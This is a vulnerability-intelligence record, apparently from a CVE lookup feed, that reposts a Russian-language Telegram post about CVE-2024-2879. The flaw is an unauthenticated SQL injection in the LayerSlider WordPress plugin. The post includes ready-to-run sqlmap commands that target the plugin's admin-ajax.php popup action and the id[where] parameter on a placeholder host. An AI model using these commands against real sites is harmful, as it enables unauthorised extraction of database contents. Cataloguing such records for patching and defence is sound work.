{"uuid": "8595f60a-50a4-40b5-a98b-13ccc82f5942", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/124661", "content": "CVE-2024-2879 LayerSlider \u043f\u043b\u0430\u0433\u0438\u043d \u0434\u043b\u044f WordPress\n*\n\u0412\u0435\u0440\u0441\u0438\u0438 LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection\n*\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0435 \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c, \u043a\u0430\u043a \u0438\u0442\u043e\u0433 = \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.\n*\nPOC usage:\nsqlmap \"https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&amp;id[where]=\" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T\n\n\n#wordpress", "creation_timestamp": "2024-04-09T22:32:45.000000Z"}